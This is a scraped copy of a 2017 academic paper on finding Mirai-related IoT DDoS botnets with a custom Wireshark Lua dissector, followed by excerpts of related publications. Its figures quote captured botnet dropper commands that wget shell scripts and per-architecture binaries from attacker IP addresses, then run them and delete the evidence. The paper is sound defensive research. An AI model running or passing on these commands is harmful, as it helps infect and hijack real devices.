DOCSLIB.ORG

An Accidental Discovery of Iot Botnets and a Method for Investigating Them with a Custom Lua Dissector

Total Page:16

File Type:pdf, Size:1020Kb

Download full-text PDF Read full-text
An Accidental Discovery of Iot Botnets and a Method for Investigating Them with a Custom Lua Dissector 2017 Annual ADFSL Conference on Digital Forensics, Security and Law Proceedings May 15th, 10:00 AM An Accidental Discovery of IoT Botnets and a Method for Investigating Them With a Custom Lua Dissector Max Gannon University of Alabama, Birmingham, [email protected] Gary Warner University of Alabama, Birmingham, [email protected] Arsh Arora University of Alabama, Birmingham, [email protected] Follow this and additional works at: https://commons.erau.edu/adfsl Part of the Digital Communications and Networking Commons, Forensic Science and Technology Commons, Information Security Commons, OS and Networks Commons, Other Computer Engineering Commons, and the Other Computer Sciences Commons Scholarly Commons Citation Gannon, Max; Warner, Gary; and Arora, Arsh, "An Accidental Discovery of IoT Botnets and a Method for Investigating Them With a Custom Lua Dissector" (2017). Annual ADFSL Conference on Digital Forensics, Security and Law. 3. https://commons.erau.edu/adfsl/2017/papers/3 This Peer Reviewed Paper is brought to you for free and open access by the Conferences at Scholarly Commons. It has been accepted for inclusion in Annual ADFSL Conference on Digital Forensics, Security and Law by an (c)ADFSL authorized administrator of Scholarly Commons. For more information, please contact [email protected]. An Accidental Discovery of IoT Botnets and ... CDFSL Proceedings 2017 AN ACCIDENTAL DISCOVERY OF IOT BOTNETS AND A :METHOD FOR INVESTIGATING THEM WITH A CUSTOM LUA DISSECTOR Max Gannon, Gary Warner, Arsh Arora University of Alabama at Birmingham 1201 University Blvd, Birmingham, AL 35233 {gannonm, gar, ararora}@uab.edu ABSTRACT This paper presents a case study that occurred while observing peer-to-peer network communications on a botnet monitoring station and shares how tools were developed to discover what ultimately was identified as Mirai and many related IoT DDOS Botnets. The paper explains how researchers developed a customized protocol dissector in Wireshark using the Lua coding language, and how this enabled them to quickly identify new DDOS variants over a five-month period of study. Keywords: IoT, Botnet, Mirai, Wireshark, LUA, DDOS 1. INTRODUCTION The problem came into the limelight when the website of famous security journalist Brian The Internet of Things (IoT) has been the Krebs came under a Distributed Denial of focus of much attention in the latter half of Service (DDOS) attack with a speed of close to 2016. It is well-established that the Internet of 650 Gbps [Krebs, 2016a]. This attack surprised Things is growing at a rapid pace and the the information security world with its sheer number of IoT devices already approaches the magnitude, almost double the size of the number of people on the planet [Nordrum, previous record. Just over a month later, 2016]. With this growth, security breaches internet users around the world noticed when could cause unprecedented damage to Dyn came under attack, again breaking the consumers and threaten the safety of the record at an estimated l.2Tbps [Hilton, 2016]. internet as a whole. The Federal Trade Both of these times the majority of the attack Commission is facing this problem by offering was directly attributed to the Mirai botnet. a $25k prize to anyone who can provide a way Mirai created an army of routers and various to protect against security vulnerabilities IoT devices forcing them to become a part of caused by out-of-date IoT devices this onslaught [Krebs, 2016b]. As the scanners [Commission, 2016]. At t he beginning of 2017, used by Mirai began to hit the botnet the FTC went even further, filing suit against monitoring stations running in the authors' D-Link alleging that they had misled the lab, it caused a temporary shift in focus from public by claiming their devices were secure, Kelihos botnet tracking towards Mirai botnet when in fact , their IP-cameras and routers tracking. In the following paper, a brief case were not [Fair, 2017]. @ 2017 ADFSL Page 27 ADFSL Conference Proceedings 2017 An Accidental Discovery of IoT Botnets and ... study is presented of how a distinctive purpose routers, as has been well documented since Lua decoder was developed for Wireshark to August 2014; TrendMicro recorded at least two study IoT botnet traffic, and results of the million vulnerable routers on the Internet investigation using the decoder are shared. [Yeh, 2014]. 2. BACKGROUND 3. EARLY EXAIVIPLE The researchers have been monitoring the SCRIPT Kelihos botnet, watching inbound traffic After discovering that this was not Kelihos, requests, because of the peer-to-peer nature of the researchers began gathering the files that the botnet. By watching the inbound requests, the monitoring station was instructed to one can learn the identity of other infected download as if it were an obedient Netis router nodes which are asking the monitored node for following the given commands. It was on commands, and this is helpful in trying to August 11, 2016, that it was discovered that determine the size and scope of the botnet. the monitoring station was being invited to Regular Kelihos traffic often makes a port 80 join an !RC-driven DDOS Botnet. This was request for a file that our monitored node can done via the plain text command shown in either provide directly or can serve as a proxy Figure 1. to provide. cd /tmp II cd /vaI/run II cd /mnt II cd /shm II cd /root II cd /; Beginning around August 4, 2016, requests began to be seen on a high-numbered UDP wget bttp://64.13 7.205.11 /lol.sh; port (53413) instead. Wireshark, a network chmod 777 lol.sh ; monitoring, network protocol analysis tool, believed that port 53413 was Skype traffic and sh lol.sh ; displayed error messages that the protocol rm -rflol.sh decode was failing. Upon manual review of Figure 1. First Received Commands these packets, it was learned that the traffic was trying to execute a Trivial File Transfer This command directed any infected Protocol (tftp) file download of a shell script routers to change into a local directory, if it file, but was doing so using a command prefix exists, named either / tmp, / var/ run, / mnt, of busybox. / shm, / root, or / . From that directory, the devices are then told to wget the file lol.sh "Busybox" is a commonly deployed binary from the IPv4 address 64.137.205.11. They are on embedded Linux systems that allows a then told to wget the file lol.sh from the IPv4 single executable to replace a large set of address 64.137.205.11. They are then told to executables by emulating the function of many make the file executable with chmod, execute standard Linux commands [Vlasenko, 2008]. its contents with sh, and then remove the After discovering the purpose of the "busybox" "evidence" with rm -rf. The file contains 2 lines prefix, it became evident that this traffic was of code which have been separated into distinct not targeting the botnet monitoring station as commands in Figure 2 below. part of Kelihos Command & Control traffic, but rather in the context of a scan to discover embedded Linux systems. Port 53413 was found to be a hardcoded backdoor port of particular Chinese-manufactured routers, with the most common being Net core and Netis Page 28 @ 2017 ADFSL An Accidental Discovery of IoT Botnets and ... CDFSL Proceedings 2017 cd /tmp 11cd /var/run II cd /mnt II cd /root II cd /-,rm -rf *;\ By this time, the criminals had begun to realize that their binary could be running on wget http:/164. 13 7.205.11/xxms; many different platforms in addition to the cat xxms >busybox.;chmod 777 busybox;./busybox Netis/ Netcore routers. To accommodate this, scanners began attempting to execute many cd /tmp II cd /var/run II cd /mnt II cd /root II cd /;rm -rf *; different versions of the same binary, compiled wget http :1/64.13 7.205.11/xxsel ; for different chipset. For example, the "gtop.sh" in the command shown in Figure 3 above cat xxsel >busybox.;chmod 777 busybox;./busybox contained this set of commands: Figure 2. File Contents cd /tmp && wget -q hnpJ/208.67. 1.175/jackmymipsel && chmod +x jackmymipsel && Jjackmymipsel cd /tmp && wgct -q hnp) /208.67.1.175/jackmymips && chmod +xjackmymips && ./jackmymips These commands also attempt to change cd /tmp && wge1 -q http://208.67.1. 175/jackmysh4 && chmod +xjad::mysh4 && Jjackmysh4 cd /tmp && wgct -q hnp:/l208.67.1.175/jackmyx86 && chmod +x.jackmyx86 && ./jackmyx86 into a directory, if it exists, named either cd /tmp && wgct-q hnp://208.67.1 .175/jackmyarm,·6 && chmod +x.jackmyannv6 && ./jackmyann,·6 / tmp, / var/ run, / mnt, / root, or / . However, cd /tmp && wgct -q http://208.6 7.1 .17S/jackmyi686 && chmod +x.jackmyi686 && ./jackmyi686 once that destination is reached they are then cd /tmp && wgc1-q hnp ://208.67.1.175/jackmypowcrpc && chmod +x.jackmypowcrpc && ./jackmypowc cd /tmp && wgct -q hnp://208.67 .1.1 75/jackmyi586 && chmod +x. jackmyi586 && ./jackmyiS 86 directed to remove any files in that location. cd /tmp && wgct-q http://208.67.1.175/jackmym86k && chmod +x.jackmym86k && ./jackmym86k W get is then used to fetch xxms from the same cd /tmp && wgct -q hnp://208.67.1.175/jackmysparc && chmod +x.jackmysparc && ./jackmysparc location, 64.137.205.11. While the process has Figure 4. Contents of gtop.sh been similar up until this point, when it comes to execution the script contents are subtler. In this case, variants can be identified for Using "cat" to rename the downloaded file to the x86, ARM, PowerPC, i686, i586, and Spare busybox, the new file is set to be executable chipsets, based on the file names alone. Each with chmod, and is then executed as an command that is for the wrong chipset will fail application.
Load more

Recommended publications
  • Malware Trends
    NCCIC National Cybersecurity and Communications Integration Center Malware Trends Industrial Control Systems Emergency Response Team (ICS-CERT) Advanced Analytical Laboratory (AAL) October 2016 This product is provided subject only to the Notification Section as indicated here:http://www.us-cert.gov/privacy/ SUMMARY This white paper will explore the changes in malware throughout the past several years, with a focus on what the security industry is most likely to see today, how asset owners can harden existing networks against these attacks, and the expected direction of developments and targets in the com- ing years. ii CONTENTS SUMMARY .................................................................................................................................................ii ACRONYMS .............................................................................................................................................. iv 1.INTRODUCTION .................................................................................................................................... 1 1.1 State of the Battlefield ..................................................................................................................... 1 2.ATTACKER TACTIC CHANGES ........................................................................................................... 2 2.1 Malware as a Service ...................................................................................................................... 2 2.2 Destructive Malware ......................................................................................................................
    [Show full text]
  • A Malicious Concept That Conquered the Elf Format
    DDOS TROJAN: A MALICIOUS fl ooding tools) that provides an attacker with the possibility of forming a malicious botnet. The framework consists of C&C CONCEPT THAT CONQUERED panels, bot builders, installation scripts, port scanners, SSH THE ELF FORMAT brute-forcers, etc. In our paper we provide a survey of current Linux DDoS bots and we sketch a wider context of usage of Peter Kálnai & Jaromír Hořejší the above-mentioned components. This topic has been covered Avast Software, Czech Republic by many independent security researchers, e.g. the MalwareMustDie! group summarised their series of blogposts Email {kalnai, horejsi}@avast.com in [2]. The authors presented its early development in [21]. 2. COMMON CHARACTERISTICS ABSTRACT DDoS threats have been around ever since the Internet took 2.1 About the ELF format over half of global communications, posing the real problem of ELF is short for ‘Executable and Linkable Format’, which is a denial of access to online service providers. Recently, a new common standard format for executables under Unix systems. trend has emerged in non-Windows DDoS attacks that has been The instruction set architecture (ISA) of the binary is stored at induced by code availability, lack of security and an abundance the offset e_machine, and we refer to this parameter using the of resources. The attack infrastructure has undergone prefi x ‘EM_’. Unix systems power not only desktop and server signifi cant changes in structure, function and complexity. machines, but are also the main operating systems for Malware has evolved into complex and relatively sophisticated embedded devices. Although Intel 80386 (EM_386) and pieces of code, employing compression, advanced encryption AMD64 (EM_x86_64) ISAs are the most common for desktops and even rootkit capabilities.
    [Show full text]
  • An Automated and Comprehensive Framework for Iot Botnet Detection and Analysis (Iot-BDA)
    This article has been accepted for publication in a future issue of this journal, but has not been fully edited. Content may change prior to final publication. Citation information: DOI 10.1109/ACCESS.2021.3110188, IEEE Access Digital Object Identifier 10.1109/ACCESS.2017.DOI An Automated and Comprehensive Framework for IoT Botnet Detection and Analysis (IoT-BDA) TOLIJAN TRAJANOVSKI1, NING ZHANG1 1Department of Computer Science, University of Manchester, M13 9PL UK Corresponding author: Tolijan Trajanovski (e-mail: [email protected]). ABSTRACT The proliferation of insecure Internet-connected devices gave rise to the IoT botnets which can grow very large rapidly and may perform high-impact cyber-attacks. The related studies for tackling IoT botnets are concerned with either capturing or analyzing IoT botnet samples, using honeypots and sandboxes, respectively. The lack of integration between the two implies that the samples captured by the honeypots must be manually submitted for analysis in sandboxes, introducing a delay during which a botnet may change its operation. Furthermore, the effectiveness of the proposed sandboxes is limited by the potential use of anti-analysis techniques and the inability to identify features for effective detection and identification of IoT botnets. In this paper, we propose and evaluate a novel framework, the IoT-BDA framework, for automated capturing, analysis, identification, and reporting of IoT botnets. The framework consists of honeypots integrated with a novel sandbox that supports a wider range of hardware and software configurations, and can identify indicators of compromise and attack, along with anti-analysis, persistence, and anti-forensics techniques. These features can make botnet detection and analysis, and infection remedy more effective.
    [Show full text]
  • Iot Vulnerabilities Easily 5
    • Babak D. Beheshti, Associate Dean of the School of Engineering and Computing Sciences at NYIT. • Clyde Bennett, Chief Healthcare Technology Strategist at Aldridge Health. • Ross Brewer, VP and MD of EMEA at LogRhythm. • Ben Desjardins, Director of Security Solutions at Radware. • Eric O'Neill, National Security Strategist at Carbon Black. • Jeff Schilling, Chief of Operations and Security at Armor. • Karl Sigler, Threat Intelligence Manager at Trustwave. • Sigurdur Stefnisson, VP of Threat Research at CYREN. • Amos Stern, CEO at Siemplify. • Ronen Yehoshua, CEO at Morphisec. ! Visit the magazine website at www.insecuremag.com Feedback and contributions: Mirko Zorz, Editor in Chief - [email protected] News: Zeljka Zorz, Managing Editor - [email protected] Marketing: Berislav Kucan, Director of Operations - [email protected] (IN)SECURE Magazine can be freely distributed in the form of the original, non-modified PDF document. Distribution of modified versions of (IN)SECURE Magazine content is prohibited without permission. ! Copyright (IN)SECURE Magazine 2016. www.insecuremag.com Are all IoT vulnerabilities easily 5. Insecure or no network pairing control op- avoidable? tions (device to device or device to net- works). Every vulnerability or privacy issue reported 6. Not testing for common code injection ex- for consumer connected home and wearable ploits. technology products since November 2015 7. The lack of transport security and encrypt- could have been easily avoided, according to ed storage including unencrypted data the Online Trust Alliance (OTA). transmission of personal and sensitive in- formation including but not limited to user OTA researchers analyzed publicly reported ID and passwords. device vulnerabilities from November 2015 8. Lacking a sustainable and supportable through July 2016, and found the most glaring plan to address vulnerabilities through the failures were attributed to: product lifecycle including the lack of soft- ware/firmware update capabilities and/or insecure and untested security patches/ 1.
    [Show full text]
  • Cyber@UC Meeting 38
    Cyber@UC Meeting 38 Becoming a Certified Ethical Hacker If You’re New! ● Join our Slack ucyber.slack.com ● Feel free to get involved with one of our committees: Content, Finance, Public Affairs, Outreach, Recruitment ● Ongoing Projects: ○ Malware Sandboxing Lab ○ Cyber Range ○ RAPIDS Cyber Op Center Announcements ● P&G visit set for Jan 22nd 2-3pm ● We’re planning school visits, reach out! ● Logo designs welcome! Public Affairs ● Please fill out Google form for GroupMe Numbers! https://goo.gl/forms/94i9kMJgtpDGXsC22 ● Our brand new YouTube channel has just been made. We will be live streaming meetings, events, etc and posting relevant videos to the channel. Please subscribe! youtube.com/channel/UCWcJuk7A_1nDj4m-cHWvIFw Follow us on our social media: Facebook: facebook.com/CyberAtUC/ Twitter: twitter.com/UCyb3r Instagram: instagram.com/cyberatuc/ Website: gauss.ececs.uc.edu/UC.yber/ Weekly Content Botnets targets ARC Processors ● What is an ARC Processor? ○ ARC stands for Argonaut RISC Core ○ 32-bit CPUs popularly used for SoC devices ○ World’s second most popular CPU core ○ In more than 2 billion products every year ● A new variant of the Mirai botnet has been found that hijacks insecure devices using ARC processors, known as Mirai Okiru ● Discovered by the MalwareMustDie team, a malware research group ● ARC processor malware is apparently very uncommon ● This malware is similar to another version of Mirai that targeted MIPS and ARM processors Mirai Okiru (continued) ● The malware used is known as Linux/Mirai ELF ● ELF malware is very
    [Show full text]
  • Decade of the Rats Threat Report
    Decade of the Cross-Platform APT Espionage Attacks Targeting Linux, Windows and Android Table of Contents Executive Summary ................................................................................................3 Lancer – An Installation Script ..................................................................................20 PWNLNX5 – The Controller .......................................................................................22 Key Findings ...........................................................................................................5 Another Linux Oddity — CASPER Mirai Variant .........................................................23 Strategic Intelligence Assessments: ........................................................................... 5 Tactical Intelligence Assessments: ............................................................................ 6 Cellular Division ...................................................................................................24 PWNDROID4 ..............................................................................................................24 Why the Targeting of Linux Systems Matters ..........................................................7 An Interesting Find .....................................................................................................26 The Linux Advantage ..............................................................................................8 CASPER Goes Mobile – PWNDROID5 .......................................................................27
    [Show full text]
  • Turning Internet of Things(Iot) Into Internet of Vulnerabilities (Iov) : Iot Botnets
    TURNING IOT INTO IOV : IOT BOTNETS 1 Turning Internet of Things(IoT) into Internet of Vulnerabilities (IoV) : IoT Botnets Kishore Angrishi Abstract—Internet of Things (IoT) is the next big evolutionary step in the world of internet. The main intention behind the IoT is to enable safer living and risk mitigation on different levels of life. Home Automation / With the advent of IoT botnets, the view towards IoT devices Smart Home has changed from enabler of enhanced living into Internet of vulnerabilities for cyber criminals. IoT botnets has exposed two Industrial Control Systems different glaring issues, 1) A large number of IoT devices are Smart City accessible over public Internet. 2) Security (if considered at all) is often an afterthought in the architecture of many wide spread Internet of Things (IoT) IoT devices. In this article, we briefly outline the anatomy of Autonomous the IoT botnets and their basic mode of operations. Some of the Vehicles Medical and healthcare major DDoS incidents using IoT botnets in recent times along Smart traffic & parking with the corresponding exploited vulnerabilities will be discussed. control We also provide remedies and recommendations to mitigate IoT Smart Metering & related cyber risks and briefly illustrate the importance of cyber Smart Grids insurance in the modern connected world. Index Terms—DDoS, IoT, IoT Botnets, Mirai Botnet, Cyber Insurance, Security I. INTRODUCTION Fig. 1. Internet of Things (IoT) The Internet of Things (IoT) is key in the digital world of connected living. The futuristic appeal to make life bit more enjoyable in a hectic day-to-day routine is enticing to many.
    [Show full text]
  • Mirai – Inside of an Iot Botnet
    Mirai – Inside of an IoT Botnet Ron Winward Security Evangelist, Americas February 7, 2017 Agenda • What this is… • A study of the Mirai structure, components, and aack vectors • A focus on the network aspects of the botnet • What this isn’t… • A code review • A how-to guide 2 Mirai Overview 3 Mirai source code released on HackForums.net • By Anna-senpai on Sep 30, 2016 • From posts and replies in the thread Anna-senpai used it for the aack on Krebs and OVH. • Some users doubNng the authenNcity of Anna-senpai, but high reputaon users acknowledged his capabiliNes 4 $$$ Efficient bot harves>ng Create account Exists ? + Assign bots - Loader and Bot wri7en in C C2 API - ScanListen and CnC service in Go ScanListen CnC - Scalable, distributed services New vic! - TargeNng BusyBox based devices 48101 23 - 60+ factory default passwords Load Svc CnC Connect Report IP + credenNals Load bot Telnet port scan Telnet port scans Bot new vicBot Telnet port scans (infected device) (infected device) Brute force login 5 Mirai predefined creden>als for brung 6 Aack Vectors 7 Mirai Easter Eggs 8 Mirai Easter Eggs I love chicken nuggets 9 Lab Setup 10 Lab Network Topology 192.168.3.2 X 192.168.3.1/24 192.168.1.1/24 192.168.2.1/24 Linksys WRT54GL/ Tomato Sricam AP003 Eth0: 192.168.3.140 ESXI Ens33: Eth1: Eth0: Eth0: Eth0: Enp2s0: 192.168.2.10 192.168.2.53 192.168.2.11 192.168.2.12 192.168.2.16 192.168.3.10 util1 ns1 cnc scanrec bot2 Target ubuntu ubuntu debian debian raspbian ubuntu Ens32: Eth0: Enp3s6: 192.168.1.4 192.168.1.53 192.168.1.8 11 management My test
    [Show full text]
  • Building a Honeypot to Research Cyber-Attack Techniques
    Building a Honeypot to Research Cyber-Attack Techniques Simon Bell, Computer Science BSc Candidate Number 18585 School of Engineering and Informatics Project Supervisor: Dr. Martin Berger University of Sussex, May 2014 Declaration This report is submitted as part requirement for the degree of Computer Science at the University of Sussex. It is the product of my own labour except where indicated in the text. The report may be freely copied and distributed provided the source is acknowledged. Signature: Simon Bell ii Acknowledgements The author wishes to thank Dr. Gareth Owen, University of Portsmouth for his input and advice on cybersecurity; Dr. Lorenzo Cavallaro, Royal Holloway, University of London for the online course on malware and advice during the project and Dr. Martin Berger for his encouragement, advice and support while supervising the project. UNIVERSITY OF SUSSEX Simon Bell, Computer Science BSc Building a Honeypot to Research Cyber-Attack Techniques Summary The internet can be a dark and dangerous place; featuring viruses and cyber attacks. This project aims to uncover some of these threats and reveal just how vulnerable the inter- net can be. The project involves creating a honeypot - a device designed to attract cyber attackers - and to analyse cyber attacks to see what is going on in the dark underworld of the internet. This dissertation explains the process involved in building a honeypot in the program- ming language C along with the results produced from that honeypot. Malicious files up- loaded to the honeypot will be analyses to gain an understanding into how cyber-attackers carry out certain types of attacks.
    [Show full text]
  • F-Secure Threat Report H1 2014
    THREAT REPORT H1 2014 SWITCH ON FREEDOM www.f-secure.com 1 CONTENTS CONTENTS 2 AT A GLANCE 3 FOREWORD 4 TOP-10 DETECTIONS DOWNADUP (aka OF NOTE CONFICKER) 5 This six years old worm exploits the MS08-067 vulnerability in Windows. It spreads over the Internet and through removable media and INCIDENTS CALENDAR 6 network shares. rounded up by... THREAT LANDSCAPE SUMMARY 8 SALITY TOP-10 DETECTIONS 9,11 MOBILE MALWARE 12 MAC MALWARE 14 SOURCES 15 H1 2014 THREAT REPORT AT A GLANCE... JANUARY FEBRUARY MARCH APRIL MAY JUNE iOS updates Coremax FBI hunts down released to fix extension does Gameover Zeus’ major SSL flaw browser hijacking mastermind Active attacks Windows XP Police ‘Oleg Pliss’ using new IE reaches official ransomware hackers arrested 0-day bug end of life (EOL) moves to Android in Moscow INCIDENTS CALENDAR Page 2014 6 +201138N MAJAVA, 11% 31 MALWARE PC MALWARE Page 12 TOP-10 DETECTIONS WEB-BASED ATTACKS, 20% MOBILE Page 9, 11 Android continues to be a favorite target for majority of the Windows threat landscape is filled with mobile threats. But threats directed towards iOS do exist, even if there are far fewer of them. existing malware families—some of which OTHERS, 38% has been around for years, being kept alive by unpatched machines. ANDROID + iOS DOWNADUP/ CONFICKER, 31% 1 FAMILYnew NEW SSLCREDTHIEF TOP-10 DETECTIONS 294 Signed library file FAMILIES DOWNADUP (aka WEB-BASED ATTACKS MAJAVA listens to outgoing SSL connections to CONFICKER) A collection of malware, A collection of exploits against VARIANTSor This six years old worm techniques, or exploits used vulnerabilities in the Java steal Apple ID and exploits the MS08-067 to redirect the web browser development platform.
    [Show full text]
  • White-Hat Worm to Fight Malware and Its Evaluation by Agent-Oriented Petri Nets †
    sensors Article White-Hat Worm to Fight Malware and Its Evaluation by Agent-Oriented Petri Nets † Shingo Yamaguchi Graduate School of Sciences and Technology for Innovation, Yamaguchi University, Ube 755-8611, Japan; [email protected] † This paper is an extended version of our paper published in Yamaguchi, S. Modeling and Evaluation of IoT Worm with Lifespan and Secondary Infectivity by Agent-Oriented Petri Net PN2. In Proceeding of the IEEE 6th International Conference on Consumer Electronics – Taiwan (IEEE 2019 ICCE-TW), Yilan, Taiwan, 20–22 May 2019. Received: 23 December 2019; Accepted: 16 January 2020; Published: 19 January 2020 Abstract: A new kind of malware called Mirai is spreading like wildfire. Mirai is characterized by targeting Internet of Things (IoT) devices. Since IoT devices are increasing explosively, it is not realistic to manage their vulnerability by human-wave tactics. This paper proposes a new approach that uses a white-hat worm to fight malware. The white-hat worm is an extension of an IoT worm called Hajime and introduces lifespan and secondary infectivity (the ability to infect a device infected by Mirai). The proposed white-hat worm was expressed as a formal model with agent-oriented Petri nets called PN2. The model enables us to simulate a battle between the white-hat worm and Mirai. The result of the simulation evaluation shows that (i) the lifespan successfully reduces the worm’s remaining if short; (ii) if the worm has low secondary infectivity, its effect depends on the lifespan; and (iii) if the worm has high secondary infectivity, it is effective without depending on the lifespan.
    [Show full text]
  • Exploring the Chinese Ddos Landscape
    WWW.VIRUSBULLETIN.COM/CONFERENCE 2019 LONDON 2 – 4 October 2019 EXPLORING THE CHINESE DDOS THREAT LANDSCAPE Nacho Sanmillan Intezer, Israel [email protected] ABSTRACT Chinese threat actors have been shown to be predominant in the DDoS ecosystem, there being a high volume of known cross-platform DDoS botnets with alleged Chinese origin operating in Linux as well as Windows systems and exercising long-term activities over the years. In this paper we will begin with a brief overview of the current most predominant Chinese threat groups, ChinaZ and Nitol, along with some other subgroups. We will cover their motivations, some of their malware characteristics, and how long they have been operational along with an overview of each group’s background. Furthermore, we will cover a range of code and artifact similarities between the groups and our give own interpretation of such connections. We will also discuss how Chinese threat groups may seem to be sharing code, showing different cases of code similarities between different families and a case study involving a specifi c Gh0st RAT variant found in the wild that has been seen in several Chinese threat actor campaigns, including some involving an APT. Finally, we will summarize our fi ndings and suggest future points of investigation. INTRODUCTION In recent years, there has been a signifi cant rise in DDoS attacks, a large proportion of which have been considered to have Chinese origins. Furthermore, China has emerged as having one of the highest rates of DDoS attacks [1]. An example of these attacks is one that targeted GitHub in February 2018 [2] that was linked to a campaign against the anti-censorship project GreatFire [3], forcing the website to go offl ine for approximately 10 minutes.
    [Show full text]